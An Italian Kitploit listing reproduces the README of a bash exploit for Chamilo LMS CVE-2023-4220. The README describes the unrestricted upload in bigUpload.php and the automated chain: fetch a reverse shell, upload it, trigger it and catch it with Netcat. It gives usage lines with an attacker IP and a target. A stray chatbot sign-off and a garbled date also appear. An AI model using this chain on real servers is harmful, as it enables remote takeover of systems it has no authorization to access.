Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Chamilo-LMS-CVE-2023-4220-Exploit — Refurbish Chamilo LMS CVE-2023-4220 exploit scritto in bash | Kitploit
Strumenti/GitHubGitHub/0xdtc/chamilo-lms-cve-2023-4220-exploit
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHub0xdtc/chamilo-lms-cve-2023-4220-exploit

Chamilo-LMS-CVE-2023-4220-Exploit

Refurbish Chamilo LMS CVE-2023-4220 exploit scritto in bash

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
11 anno faNon ancora revisionato
Condividi

Chamilo LMS Exploit CVE-2023-4220

Panoramica

Questo script sfrutta una vulnerabilità di esecuzione di codice remoto (RCE) in Chamilo LMS versione ≤ v1.11.24. La vulnerabilità (CVE-2023-4220) esiste a causa di una funzionalità di caricamento file senza restrizioni nell'endpoint bigUpload.php di Chamilo LMS, che consente agli attaccanti di caricare file arbitrari (come shell web) ed eseguirli, portando a una completa esecuzione di codice remoto sul server.

Questo script è stato migliorato da Divine Clown per semplificare il processo di sfruttamento: genera automaticamente un file di reverse shell, lo carica sul target e avvia un listener per dare all'attaccante accesso diretto alla shell.


Dettagli CVE

  • ID CVE: CVE-2023-4220
  • Software interessato: Chamilo LMS ≤ v1.11.24
  • Tipo di vulnerabilità: Esecuzione di codice remoto (RCE)
  • Vettore di attacco: Caricamento file senza restrizioni in /main/inc/lib/javascript/bigupload/inc/bigUpload.php

Caratteristiche

  • Scarica automaticamente una reverse shell da revshells.com basata sull'IP e sulla porta dell'attaccante.
  • Carica la reverse shell utilizzando l'endpoint vulnerabile bigUpload.php.
  • Attiva silenziosamente la shell e apre un listener Netcat per l'accesso diretto.

Miglioramento di Divine Clown:

  • Tutti i passaggi intermedi (scaricare la shell, caricarla, ecc.) sono nascosti, mostrando solo la reverse shell risultante per un uso semplificato.

Utilizzo

root@kitploit:~
./CVE-2023-4220.sh -i <ip_attaccante> -p <porta> -h <link_host>

Parametri:

  • -i <ip_attaccante>: Indirizzo IP dell'attaccante per la reverse shell.
  • -p <porta>: Porta su cui verrà avviato il listener Netcat.
  • -h <link_host>: URL completo dell'istanza vulnerabile di Chamilo LMS.

Esempio:

root@kitploit:~
./CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com

Prerequisiti

  • Netcat installato sulla tua macchina.
  • Assicurati che la versione target di Chamilo LMS sia vulnerabile (≤ v1.11.24).
  • Permessi adeguati per eseguire test di penetrazione o sfruttamento.

Analisi tecnica

  1. Lo script scarica una reverse shell da revshells.com, generandola dinamicamente in base all'IP e alla porta dell'attaccante.
  2. La reverse shell viene caricata sull'endpoint vulnerabile bigUpload.php.
  3. Il file caricato viene eseguito accedendo al suo URL sul server.
  4. Viene avviato un listener Netcat e, una volta attivato il file, viene stabilita una connessione reverse shell, fornendo all'attaccante accesso alla riga di comando.

Disclaimer legale

Questo strumento è destinato esclusivamente a scopi educativi e ad ambienti di test in cui si dispone dell'autorizzazione esplicita per sfruttare vulnerabilità. L'accesso non autorizzato ai sistemi è illegale e può comportare conseguenze penali. Gli autori non saranno ritenuti responsabili per qualsiasi uso improprio o danno causato da questo script.


Crediti

  • Autore exploit originale: Ziad Sakr @Ziad-Sakr
  • Miglioramenti e perfezionamenti: ME (Divine Clown)

Sentiti libero di modificare ulteriormente il README se desideri includere informazioni aggiuntive o formattazione! Fammi sapere se hai bisogno di altro.

Scarica lo strumento